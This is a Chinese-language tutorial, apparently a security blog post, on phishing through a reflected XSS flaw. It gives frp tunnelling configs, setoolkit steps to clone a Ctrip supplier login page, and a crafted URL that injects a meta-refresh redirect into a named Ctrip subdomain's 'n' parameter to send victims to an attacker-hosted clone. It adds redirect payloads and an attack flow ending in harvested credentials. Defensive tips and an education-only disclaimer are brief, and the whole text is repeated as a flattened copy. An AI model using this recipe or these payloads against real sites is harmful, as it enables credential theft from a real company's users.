拎着xss去钓鱼
字数 943 2025-08-18 11:38:28

利用XSS漏洞进行钓鱼攻击的详细教学文档

1. 概述

本教学文档详细介绍了如何利用反射型XSS漏洞进行钓鱼攻击的技术方法。通过结合XSS漏洞、内网穿透工具和钓鱼页面生成工具,实现有效的钓鱼攻击。

2. 所需工具

  1. frp - 内网穿透工具,用于将本地Kali环境暴露到公网
  2. setoolkit (Social Engineering Toolkit) - 钓鱼页面生成工具
  3. 存在XSS漏洞的网站 - 文档中以携程某分站为例

3. 详细步骤

3.1 frp配置

服务器端配置 (VPS)

[common]
bind_port = 7000

客户端配置 (Kali)

[common]
server_addr = x.x.x.x  # VPS IP地址
server_port = 7000

[web]
type = tcp
local_ip = 127.0.0.1
local_port = 80
remote_port = 8080

说明:将Kali的80端口映射到VPS的8080端口,使钓鱼页面可通过互联网访问。

3.2 使用setoolkit生成钓鱼页面

  1. 启动setoolkit:setoolkit
  2. 选择攻击类型:
    1) 社会工程学攻击
    
  3. 选择网页攻击:
    2) 网页攻击
    
  4. 选择钓鱼网站攻击:
    3) 钓鱼网站攻击
    
  5. 选择网站克隆:
    2) 网站克隆
    
  6. 输入接收数据的IP地址(默认即可)
  7. 输入要克隆的网站URL(示例:http://xxxxx.ctrip.com/hotel-supplier-ebookingapp/Home/Login.aspx

3.3 利用XSS漏洞进行钓鱼

构造恶意URL(以携程分站为例):

https://xxxx.ctrip.com/Package_Vendor_Vbooking/UserManagement/ResetPwd.aspx?n=qingdao%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%220%3Burl%3Dhttp%3A%2f%2fx.x.x.x:8080%22%3E

技术原理

  • 利用n参数存在的XSS漏洞
  • 注入<meta>标签实现自动跳转
  • content="0;url=http://x.x.x.x:8080"表示立即跳转到钓鱼页面

3.4 其他URL跳转测试语句

  1. JavaScript跳转:

    window.location.href="top.jsp";
    self.location='top.htm';
    window.location.replace("http://www.example.com/");
    top.location='xx.jsp';
    
  2. Meta标签跳转:

    <meta http-equiv="refresh" content="20">
    <meta http-equiv="refresh" content="0;url=http://example.com">
    
  3. iframe加载:

    <iframe src="http://www.example.com/img/tide.png"></iframe>
    

4. 攻击流程总结

  1. 识别目标网站存在的反射型XSS漏洞
  2. 使用setoolkit克隆目标登录页面
  3. 配置frp将钓鱼页面暴露到公网
  4. 构造包含XSS payload的恶意URL
  5. 诱导用户点击恶意URL
  6. 用户浏览器执行XSS代码,自动跳转到钓鱼页面
  7. 用户输入凭据后被记录

5. 防御措施

  1. 对所有用户输入进行严格的过滤和转义
  2. 实施内容安全策略(CSP)
  3. 设置HttpOnly和Secure标志的cookie
  4. 对敏感操作实施二次验证
  5. 教育用户识别可疑URL

6. 法律声明

本技术文档仅用于教育目的和安全研究。未经授权的渗透测试和攻击行为可能违反法律。请在法律允许范围内使用这些知识。

利用XSS漏洞进行钓鱼攻击的详细教学文档 1. 概述 本教学文档详细介绍了如何利用反射型XSS漏洞进行钓鱼攻击的技术方法。通过结合XSS漏洞、内网穿透工具和钓鱼页面生成工具,实现有效的钓鱼攻击。 2. 所需工具 frp - 内网穿透工具,用于将本地Kali环境暴露到公网 setoolkit (Social Engineering Toolkit) - 钓鱼页面生成工具 存在XSS漏洞的网站 - 文档中以携程某分站为例 3. 详细步骤 3.1 frp配置 服务器端配置 (VPS) 客户端配置 (Kali) 说明 :将Kali的80端口映射到VPS的8080端口,使钓鱼页面可通过互联网访问。 3.2 使用setoolkit生成钓鱼页面 启动setoolkit: setoolkit 选择攻击类型: 选择网页攻击: 选择钓鱼网站攻击: 选择网站克隆: 输入接收数据的IP地址(默认即可) 输入要克隆的网站URL(示例: http://xxxxx.ctrip.com/hotel-supplier-ebookingapp/Home/Login.aspx ) 3.3 利用XSS漏洞进行钓鱼 构造恶意URL(以携程分站为例): 技术原理 : 利用 n 参数存在的XSS漏洞 注入 <meta> 标签实现自动跳转 content="0;url=http://x.x.x.x:8080" 表示立即跳转到钓鱼页面 3.4 其他URL跳转测试语句 JavaScript跳转: Meta标签跳转: iframe加载: 4. 攻击流程总结 识别目标网站存在的反射型XSS漏洞 使用setoolkit克隆目标登录页面 配置frp将钓鱼页面暴露到公网 构造包含XSS payload的恶意URL 诱导用户点击恶意URL 用户浏览器执行XSS代码,自动跳转到钓鱼页面 用户输入凭据后被记录 5. 防御措施 对所有用户输入进行严格的过滤和转义 实施内容安全策略(CSP) 设置HttpOnly和Secure标志的cookie 对敏感操作实施二次验证 教育用户识别可疑URL 6. 法律声明 本技术文档仅用于教育目的和安全研究。未经授权的渗透测试和攻击行为可能违反法律。请在法律允许范围内使用这些知识。